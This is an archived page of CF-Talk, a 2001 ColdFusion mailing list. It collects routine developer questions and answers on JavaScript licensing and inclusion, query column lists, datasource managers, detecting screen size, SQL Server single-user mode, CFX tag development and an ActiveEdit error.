using a custom tag vs an include vs just putting it in the page?  For that 
matter, has anyone done and number crunching for Custom Tag vs Include vs 
just putting it in the page?

  Since JavaScript is not processed by CF, obviously just putting it into 
the page is the most efficient.  I can see the benefits of using an include 
if the same JavaScripts are used in many places.  I'm not sure why you 
would want to make it into a custom tag.

At 09:37 AM 09/18/2001 -0400, you wrote:
>I know this is OT, but I thought those of you in this list would be best
>able to answer this question.
>
>We use Dreamweaver UD4 with CFStudio to build our applications, in doing
>this, we use some of the core MM JavaScript in our sites. We've recently
>created a common JavaScript library for all our sites using a CustomTag to
>call the script into any site. Included in this library, we added 3 or 4 of
>the core MM scripts we often use, is there a legal problem involved if
>someone downloads this library from us with the MM scripts attached? Is
>there a disclaimer we need to add or is this just something that MM expects
>will happen?
>
>Thanks,
>
>Joshua Miller
>Web Development::Programming
>Eagle Technologies Group, Inc.
>www.eagletgi.com
>[EMAIL PROTECTED]
>
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

OT: Macromedia Legal Issue

2001-09-18 Thread Joshua Miller


I know this is OT, but I thought those of you in this list would be best
able to answer this question.

We use Dreamweaver UD4 with CFStudio to build our applications, in doing
this, we use some of the core MM JavaScript in our sites. We've recently
created a common JavaScript library for all our sites using a CustomTag to
call the script into any site. Included in this library, we added 3 or 4 of
the core MM scripts we often use, is there a legal problem involved if
someone downloads this library from us with the MM scripts attached? Is
there a disclaimer we need to add or is this just something that MM expects
will happen?

Thanks,

Joshua Miller
Web Development::Programming
Eagle Technologies Group, Inc.
www.eagletgi.com
[EMAIL PROTECTED]
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

How do you check the integrity of your code and links?

2001-09-18 Thread Earl, George


For several years we have been using CSE HTML Validator to check our HTML
code and tools like Coast Webmaster to check the integrity of our links. We
are moving from our archaic, static page method to a more dynamic method
that makes use of  and JavaScript, among other things. With this
new method we no longer have very many totally self-contained page files
(i.e., we use  to pull the header and footer into every page),
therefore CSE HTML Validator and Coast Webmaster croak at what appear to be
errors but what are in fact valid segments of code. How is everyone else
getting around this? How are you checking the integrity of your code? How
are you checking the integrity of your links? Thanks!

George
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: returning a column list

2001-09-18 Thread Clint Tredway


You would need to compare the output of each column and then keep only the ones that 
have data in them.

Clint

-- Original Message --
from: "Tristram Charnley" <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
date: Tue, 18 Sep 2001 10:39:46 +0100

Hi all

I'm building an SQL query where in addition to the results returned I also 
need to build a list containing the column names which contain values 
and excludes columns which have null values in that recordset.

AFAIK the Columnlist variable returns all the columns by default.

Anyone have a quick solution?

Tristram Charnley


~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Is the still a newsgroup address for this forum?

2001-09-18 Thread Erika L. Walker


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/

or www.tallylist.com


Erika
--


>>--| -Original Message-
>>--| From: W. Hubbard [mailto:[EMAIL PROTECTED]]
>>--| Sent: Tuesday, September 18, 2001 8:41 AM
>>--| To: CF-Talk
>>--| Subject: Is the still a newsgroup address for this forum?
>>--| 
>>--| 
>>--| Is there a newsgroup address for this forum or a place
>>--| to search for information from previous messages?  
>>--| 
>>--| I seem to remember something about a way to identify
>>--| the screen pixel size so that web page could be
>>--| adjusted accordingly.  Does anyone know how to do this
>>--| or where to find information about how to do this.
>>--| 
>>--| 
>>--| 
>>--| 
>>--| 
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Datasource Manager

2001-09-18 Thread Clint Tredway


I have one that will do access and sql server DSNs.

Let me know and I will zip it up and send it to you.

Clint

-- Original Message --
from: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
date: Tue, 18 Sep 2001 05:32:27 -0400

Anyone out there know of a good, hopefully free Datasource manager.. it doesn't 
even HAVE to list datasources.. I can keep track on my own if I have to.. but I 
need one ASAP..

Thanks,

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Is the still a newsgroup address for this forum?

2001-09-18 Thread Critter


Hello W.,

javascript..

screen.availWidth;
screen.availHeight;

there is a link to the archives at the bottom of each message.



-- 
Critter, MMCP
Certified ColdFusion Developer

Crit[s2k] - 
---
Tuesday, September 18, 2001, 8:41:28 AM, you wrote:

WH> Is there a newsgroup address for this forum or a place
WH> to search for information from previous messages?  

WH> I seem to remember something about a way to identify
WH> the screen pixel size so that web page could be
WH> adjusted accordingly.  Does anyone know how to do this
WH> or where to find information about how to do this.




WH> 
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Is the still a newsgroup address for this forum?

2001-09-18 Thread W. Hubbard


Is there a newsgroup address for this forum or a place
to search for information from previous messages?  

I seem to remember something about a way to identify
the screen pixel size so that web page could be
adjusted accordingly.  Does anyone know how to do this
or where to find information about how to do this.




~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Fwd: Address verification request

2001-09-18 Thread phumes1



Form-Type: [List-Manager-Commands]
Command: [auth dddf63b3]
Command: [subscribe <[EMAIL PROTECTED]>]
Command: [end]

FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Sql 2000 going to Single User Mode

2001-09-18 Thread William J Wheatley


Any idea why sql server 2k went into Single User Mode its done it now on 
a few different Dbs just wondering what i'm doing wrong here :)  making 
me pull out my hair

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Want to make a CFX tag but have only CF language expereience

2001-09-18 Thread Larry W. Virden


from: "Jon Hall" <[EMAIL PROTECTED]>

> CFX programming is done in either Java or C++ (others?). Java is by far the
> easier to learn though. I cant really speak for C, but the process for
> interfacing with CF via the Java CFX api is prettty simple as long as you
> understand Java. I dont know if I have formal programming experience, but I
> picked up enough Java to do what you want just hitting the books at night
> and on the weekends for 3 or 4 months.
  ^

It's a shame that things are so complex.  C itself is pretty simple to learn
- I think I learned most of what I needed to program in C in about a week or
less.

Unfortunately, I've yet to successfully write a C CFX - the interfaces
for ColdFusion are so vaguely documented that it is pretty bad.

What we've done is write external stand alone commands then then called
them using cf-execute() ...
-- 
Never apply a Star Trek solution to a Babylon 5 problem.
Larry W. Virden  http://www.purl.org/NET/lvirden/>
Even if explicitly stated to the contrary, nothing in this posting should 
be construed as representing my employer's opinions.
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Suggestion to list

2001-09-18 Thread Larry W. Virden


When mailing list titles are stuffed into the Subject, it messes up many
readers so they are no longer able to sort the messages into the proper
order to read them - because the [stuff] gets sorted strangely.
-- 
Never apply a Star Trek solution to a Babylon 5 problem.
Larry W. Virden  http://www.purl.org/NET/lvirden/>
Even if explicitly stated to the contrary, nothing in this posting should 
be construed as representing my employer's opinions.
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Datasource Manager

2001-09-18 Thread Neil Clark


http://devex.allaire.com/developer/gallery/info.cfm?ID=9C9C32B0-7F93-11D5-83
F300508B94F85A&method=Full

this is a good one.  The encrypted on is free I think and the Open Source
one is $60 so not too bad.

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Datasource Manager

2001-09-18 Thread thicks


Anyone out there know of a good, hopefully free Datasource manager.. it doesn't 
even HAVE to list datasources.. I can keep track on my own if I have to.. but I 
need one ASAP..

Thanks,
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE:ActiveEdit

2001-09-18 Thread Declan Maher


Hi,
Can anybody help me with a problem with ActiveEdit that I am having
since importing my database from Access to SQL Server.

The connection information seems to be right:

However the error message I am getting is as follows.
"Cookies are not enabled or a Coldfusion Error has occurred.Be sure that
Cookies are enabled on your browser and that all the ActiveEdit
attributes are correct."

Any suggestions or help greatly appreciated.

Cheers,

Declan Maher
Web Applications Developer

Head Office
133-137 Lisburn Road
Belfast 
Northern Ireland

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

returning a column list

2001-09-18 Thread Tristram Charnley


Hi all

I'm building an SQL query where in addition to the results returned I also 
need to build a list containing the column names which contain values 
and excludes columns which have null values in that recordset.

AFAIK the Columnlist variable returns all the columns by default.

Anyone have a quick solution?

Tristram Charnley

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Datasource Manager

2001-09-18 Thread thicks


Anyone out there know of a good, hopefully free Datasource manager.. it doesn't 
even HAVE to list datasources.. I can keep track on my own if I have to.. but I 
need one ASAP..

Thanks,
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

1 2 >

1 - 100 of 101 matches

Mail list logo